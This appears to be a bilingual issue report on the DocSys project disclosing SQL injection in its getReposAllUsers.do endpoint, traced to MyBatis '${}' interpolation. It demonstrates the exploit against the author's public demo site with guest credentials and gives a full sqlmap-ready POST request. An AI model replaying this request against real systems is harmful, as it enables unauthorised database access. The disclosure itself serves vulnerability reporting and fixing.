getReposAllUsers.do等接口存在sql注入风险

**English** ：
**There is an interface for sql injection：** 
/DocSystem/Repos/getReposAllUsers.do

It can be seen from the back-end code that the interface database query uses 'getReposAllUsers()', and receives two parameters 'searchWord' and 'reposId':
![输入图片说明](https://foruda.gitee.com/images/1670814246777407938/2ce54de6_10652570.png "屏幕截图")

'getReposAllUsers()' uses 'queryReposMemberWithParamLike()' to process the incoming parameters
![输入图片说明](https://foruda.gitee.com/images/1670813172575461569/e92216b3_10652570.png "屏幕截图")
![输入图片说明](https://foruda.gitee.com/images/1670813187299781022/01a849f4_10652570.png "屏幕截图")
View 'ReposAuthMapper.xml'：
![输入图片说明](https://foruda.gitee.com/images/1670813196911073140/0359d221_10652570.png "屏幕截图")

It is found that ‘queryReposMemberWithParamLike‘ uses '${}' for the incoming parameters without precompilation, which will lead to sql injection vulnerabilities.

**Vulnerability Exploitation Process Demonstration**

Use the demo site provided by the author to demonstrate the exploit.

http://dw.gofreeteam.com/DocSystem/web/index.html

Login with guest/guest
![输入图片说明](https://foruda.gitee.com/images/1670813234257051761/79dae71f_10652570.png "屏幕截图")
Grab the request packet：
![输入图片说明](https://foruda.gitee.com/images/1670813250197535165/9061ba2b_10652570.png "屏幕截图")

Modify the URL to ‘/DocSystem/Repos/getReposAllUsers.do‘ and change it to the post request method:
![输入图片说明](https://foruda.gitee.com/images/1670813258185363625/e586652c_10652570.png "屏幕截图")

Construct the request to populate the ‘reposId‘ and ‘searchWord‘ parameter:
![输入图片说明](https://foruda.gitee.com/images/1670813292516270550/895a2815_10652570.png "屏幕截图")

SQL injection using searchWord parameters：

![输入图片说明](https://foruda.gitee.com/images/1670813299810581515/ca92d941_10652570.png "屏幕截图")

Use sqlmap for verification, the data package is as follows:

```
POST /DocSystem/Repos/getReposAllUsers.do HTTP/1.1
Host: dw.gofreeteam.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=30230AB3A967C905F212A4D3A981894D
If-Modified-Since: Mon, 15 Aug 2022 09:41:58 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

reposId=28&searchWord=*
```

Use sql injection vulnerability to get the current database name：
![输入图片说明](https://foruda.gitee.com/images/1670813360028151506/9080a698_10652570.png "屏幕截图")

**中文：** 
**存在注入的接口：** 
/DocSystem/Repos/getReposAllUsers.do

通过后端代码可知，该接口数据库查询使用了getReposAllUsers()，并包含两个参数searchWord以及reposId：
![输入图片说明](https://foruda.gitee.com/images/1670814287595175382/68b3f77f_10652570.png "屏幕截图")

getReposAllUsers() 又使用了queryReposMemberWithParamLike()对传入的参数进行处理
![输入图片说明](https://foruda.gitee.com/images/1670813172575461569/e92216b3_10652570.png "屏幕截图")
![输入图片说明](https://foruda.gitee.com/images/1670813187299781022/01a849f4_10652570.png "屏幕截图")
查看ReposAuthMapper.xml：
![输入图片说明](https://foruda.gitee.com/images/1670813196911073140/0359d221_10652570.png "屏幕截图")
发现queryReposMemberWithParamLike中对参数使用'${}'，未作预编译，会导致sql注入漏洞。

**漏洞演示：** 
利用作者提供的演示站点进行利用：
http://dw.gofreeteam.com/DocSystem/web/index.html
使用guest/guest登录
![输入图片说明](https://foruda.gitee.com/images/1670813234257051761/79dae71f_10652570.png "屏幕截图")
抓包：
![输入图片说明](https://foruda.gitee.com/images/1670813250197535165/9061ba2b_10652570.png "屏幕截图")
修改URL为/DocSystem/Repos/getReposAllUsers.do 并改为post请求：
![输入图片说明](https://foruda.gitee.com/images/1670813258185363625/e586652c_10652570.png "屏幕截图")
构造请求填充reposId和searchWord字段：
![输入图片说明](https://foruda.gitee.com/images/1670813292516270550/895a2815_10652570.png "屏幕截图")
利用searchWord参数进行sql注入：
![输入图片说明](https://foruda.gitee.com/images/1670813299810581515/ca92d941_10652570.png "屏幕截图")
使用sqlmap进行验证，数据包如下：

```
POST /DocSystem/Repos/getReposAllUsers.do HTTP/1.1
Host: dw.gofreeteam.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=30230AB3A967C905F212A4D3A981894D
If-Modified-Since: Mon, 15 Aug 2022 09:41:58 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

reposId=28&searchWord=*
```

注入得到当前数据库名：
![输入图片说明](https://foruda.gitee.com/images/1670813360028151506/9080a698_10652570.png "屏幕截图")

此外，还有其他接口的like语句也未使用预编译。

Rainy/DocSys

内容风险标识

评论 (2)

Rainy/DocSys .gitee-modal { width: 500px !important; }

内容风险标识